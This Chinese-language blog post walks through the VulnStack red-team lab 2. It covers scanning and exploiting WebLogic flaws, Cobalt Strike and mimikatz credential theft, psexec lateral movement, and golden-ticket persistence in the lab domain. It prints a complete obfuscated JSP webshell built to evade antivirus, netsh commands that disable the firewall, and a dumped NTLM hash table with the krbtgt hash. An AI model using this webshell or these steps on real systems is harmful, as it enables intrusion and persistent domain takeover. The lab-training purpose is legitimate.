闲雨赋花逃相思&红日ATT&CK红队评估实战系列-[VulnStack]红日实战靶场(二)
2023-2-6 09:17:12 Author: 猫哥的秋刀鱼回忆录(查看原文) 阅读量:85 收藏

免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,猫哥的秋刀鱼回忆录及文章作者不为此承担任何责任。猫哥的秋刀鱼回忆录公众号均不发表带原创标志的文章,转载请附带公众号出处!红日靶场(二)环境地址官方百度云盘地址均已失效,请通过其他手段获取本文中的靶机资源。

前言

在阅读本文前,我默认你已然阅读并了解思路梳理剖析&手法具现可视化实验&红日ATT&CK实战系列 红队实战(一)一文中所涉及的思路。本文主要叙述并涉及以下几点命题:

  • 以真实企业环境为实例搭建红队实战系列系列靶场,通过练习、视频教程、博客三位一体学习
  • 红队环境主要涉及Access Token利用,WMI利用,域漏洞利用SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用,黄金票据/白银票据/Sid History/MOF等攻防技术

鲁迅《伤逝》中写道:

这是真的,爱情必须时时更新、生长、创造!日子一久,只落得麻痹了翅子,即使放出笼外,早已不能奋飞,现在总算逃出这笼子,我从此 在新的开阔的天空中翱翔,趁我还未忘了我的翅子的扇动。

环境配置提要

  • DC域控:delay\delay IP:10.10.10.10 OS:Windows Servevr 2012 AD域
  • PC用户:delay\mssql IP:10.10.10.201+192.168.111.201 OS:Windows 7 未知
  • WEB服务:delay\Administrator IP:10.10.10.80+192.168.111.80 OS:Windows Server 2008 Weblogic+MSSQL

前期信息收集

主要甄别并重点筛查DMZ区开放的两个IP

  • 192.168.111.80
  • 192.168.111.201

使用Goby红队版进行扫描测试

风险分布

风险资产分布

风险统计

端口情况

软件比重

漏洞清单

资产情况

中期漏洞测试

根据在192.168.111.80的7001端口开放的Weblogic服务来看,我们的重点是通过80机器的Weblogic服务下手,看看能不能拿到较高权限的shell,一般java服务都是以较高权限运行。使用Xray高级版进行漏扫测试与WeblogicScan工具与Goby结果做比对。当然了一键梭哈的工具不少,比如shack2与6哥的反序列化利用工具,Liqun工具箱都可以检测

漏洞比对

通过比对发现存在

  • CVE-2019-2725
  • CVE-2020-14750
  • CVE-2021-2109
  • CVE-2017-3506
  • CVE-2014-4210
  • CVE-2020-14883

漏洞虽多,直接挑选RCE的梭哈就好,考虑后期使用CS提权,直接通过Java反序列化漏洞利用工具/Liqun直接梭哈上马弹shell,抽根利群压压惊。

梭哈上马

生成马,传马,上马,热烈的马

内网渗透准备

查看本机IP、版本信息、补丁信息等,发现主机是08R2,并且存在域 de1ay.com,并且是双网卡机器

内网信息收集

先做个桑拿-BloodHound,看看域环境是个啥样子

大概率是崩溃了,没事,最起码得给360一点面子

我们直接生成免杀马子上线CS就好

内网渗透测试

先提个SYSTEM权限再说下一步

先看看这台机器的环境配置,简单了解

存在杀软信息如下:

  • ZhuDongFangYu.exe:360安全卫士-主动防御
  • launcher.exe:Intercort Systems
  • tc.exe:TimeCalende

还开着防火墙呢,nm直接给你关了

Windows server 2003及之前版本:
netsh firewall set opmode disable    #关闭  
netsh firewall set opmode enable     #开启
Windows server 2003之后版本:
netsh advfirewall set allprofiles state off    #关闭    
netsh advfirewall set allprofiles state on     #开启

其他还是老样子,一键收集信息,然后分析分析

多的就不放图了,可以知道当前存在域de1ay.com,当前域成员有两台机器PC和WEB,WEB为当前获取权限的机器,域控为DC。通过ping域控名DC可知当前域控ip为10.10.10.10,还是推荐用ladon插件与Fscan大保健直接开扫

hashdump获取凭证信息之后可以PTH横向移动,再使用mimikatz抓一下明文密码,成功抓取到WEB机器的密码:[email protected]

我们这会抓到密码之后可以尝试碰撞其他主机,这里有一个小问题,在我测试时发现,PC机器开了防火墙,我手贱开了它上面的360,导致我在WEB机器上扫不到它,,还有就是在CS的存活页面明明扫到了10.10.10.10域控机器,但是不显示,我猜测时CS自己的问题。所以我通过portscan命令再刷新下

发现这会在页面探活到10域控机器了

很操蛋的事儿就来了,WEB主机和DC都没办法去ping通这个PC机子,让我静静。想了一会还是先拿DC域控下手,由于445端口是开启的,我们可以尝试一下域横向移动,然后我们还得到了管理员的账号密码,就可以利用SMB beacon横向移动。因为连接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB  Beacon相对隐蔽,绕防火墙时可能发挥奇效。先用派生出来一个会话,利用psexec横向移动,巴拉巴拉,这一部分和上一篇时一样的操作,都是利用SMB管道直接碰撞拿下

大致就是这样子

接下来就是这个域内用户PC了,好奇葩啊,域控都ping不通它,妈的

我猜测可能是有两个原因:

  1. 防火墙
  2. 在配置环境时手贱用域控管理员身份开的360

我想到既然在之前的Goby扫描中看到了它可能存在MS17-010,但是我就是很好奇,这个域内的PC机子,怎么会有公网地址?而且域控还ping不同它?这就离谱。

接下来我使用Ladon/noping扫描验证我的想法,实际上就是防火墙的问题,禁icmp,当然你也可以选择关闭,我们就直接能够横向了。

所以我打算直接关掉PC机器的防火墙,嘿嘿!因为真实环境中你™域控都ping不到你你™是什么PC办公机?老操作

还是横向移动,利用psexec直接登陆直接拿下,如图

至此所有的机器都全部拿下。

360安全防护

在上传冰蝎马时,我用了工具中自带的webshell,发现一传上去就会被360给爆掉

无奈之下选择用免杀

<%! public byte[] AWA71(String Strings,String k) { try {javax.crypto.Cipher Bx0T9h = javax.crypto.Cipher.getInstance("AES/ECB/PKCS5Padding");Bx0T9h.init(javax.crypto.Cipher.DECRYPT_MODE, (javax.crypto.spec.SecretKeySpec) Class.forName("javax.crypto.spec.SecretKeySpec").getConstructor(byte[].class, String.class).newInstance(k.getBytes(), "AES"));int[] aa = new int[]{99, 101, 126, 62, 125, 121, 99, 115, 62, 82, 81, 67, 85, 38, 36, 84, 117, 115, 127, 116, 117, 98};String ccstr = "";for (int i = 0; i < aa.length; i++) { aa[i] = aa[i] ^ 0x010;ccstr = ccstr + (char) aa[i];}byte[] bytes = (byte[]) Class.forName(ccstr).getMethod("decodeBuffer", String.class).invoke(Class.forName(ccstr).newInstance(), Strings);byte[] result = (byte[]) Bx0T9h.getClass()./*Z271l09O33*/getDeclaredMethod/*Z271l09O33*/("doFinal", new Class[]{byte[].class}).invoke(Bx0T9h,new Object[]{bytes});return result;} catch (Exception e) {e.printStackTrace();return null;} } %><%  try {  String Kj65763 = "bf21a14d8b0eb60f";  session.putValue("u", Kj65763);  byte[] I9Z828r = AWA71 (request.getReader().readLine(),Kj65763);  java./*Z271l09O33*/lang./*Z271l09O33*/reflect.Method AWA71 = Class.forName("java.lang.ClassLoader").getDeclaredMethod/*Z271l09O33*/("defineClass",byte[].class,int/**/.class,int/**/.class);  AWA71.setAccessible(true);  Class i = (Class)AWA71.invoke(Thread.currentThread()./*Z271l09O33*/getContextClassLoader(), I9Z828r , 0, I9Z828r.length);  Object QP5D = i./*Z271l09O33*/newInstance();  QP5D.equals(pageContext); } catch (Exception e) {response.sendError(404);} %>

这样就能够正常的进行连接

CS上线的马子也是简单免杀一下,没有什么问题。但是据我所看到的一些攻略说即使没有做免杀,也是能够弹回shell的,也许是360版本太低年代久远杀不掉这个shell。基本在上线和提权过程在没有遇到360的事儿,或者说在抓到管理员密码后,直接连上3389给他关掉也可以的。使用进程中杀掉360的方式实际上是不可能和不显示的,我们只需要把WEB这台机器作为跳板使用就行了。直接用smb beacon横移psexec打内网是最快最便捷的方式。在打PC机时360会拦截MS17-010攻击,我们默认正常环境,而不是这种同网段内ping不同的离谱事情,所以我在打PC机就直接用smb beacon横移psexec就行了。MS17-010且不说能不能成功,在360拦截下我感觉挺离谱的。

域控权限维持

制作黄金票据&提取域控hash

Administrator:500:aad3b435b51404eeaad3b435b51404ee:531f4ef92a67d9d40906ad6e1b8510ca:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:82dfc71b72a11ef37d663047bc2088fb:::
de1ay:1001:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
mssql:2103:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
DC$:1002:aad3b435b51404eeaad3b435b51404ee:b42c234ea64f09ee3d4d697f79d7e4e1:::
PC$:1105:aad3b435b51404eeaad3b435b51404ee:152cf66967c8b1f059bc85b6ef73994a:::
WEB$:1603:aad3b435b51404eeaad3b435b51404ee:bc0bd5ea0c63677c8f5716aafbc0fd34:::

黄金票据的条件要求:

1.域名称  de1ay.com

2.域的SID值 S-1-5-21-2756371121-2868759905-3853650604

3.域的Krbtgt账户NTLM hash 82dfc71b72a11ef37d663047bc2088fb

4.伪造用户名 jbjb

黄金票据可以在拥有普通域用户权限和KRBTGT账号的哈希的情况下用来获取域管理员权限,上面已经获得域控的system权限了,还可以使用黄金票据做权限维持,当域控权限掉落后,我们还可以再通过域内其他任意机器伪造票据重新获取最高权限。这就是我们票据伪造的意义之处。

伪造金票成功

也可以手动使用mimikatz去伪造,此时就可以通过dir成功访问域控的共享文件夹,这里10.10.10.10 为域控主机

牢记我们Krbtgt账户NTLM hash是从DC上偷过来的,然后我们在域内除域控的主机上伪造一张金票,就可以在日后域控DC掉了后进行权限的维持

结束语

因为这个靶场红日官方的百度网盘链接挂了,我从网上找的,可能它的环境配置问题很大,所以我感觉这个和第一个区别不大,只不过打点利用换成Weblogic,加了360而已,区别不大。


文章来源: http://mp.weixin.qq.com/s?__biz=Mzk0NjMyNDcxMg==&mid=2247499081&idx=1&sn=a5e8b087dd305aaa4637a51da2758167&chksm=c30568cef472e1d87a639281578a622f7d07b91dc393240f574ac56a7859a97b0c03e41bbeb8#rd
如有侵权请联系:admin#unsafe.sh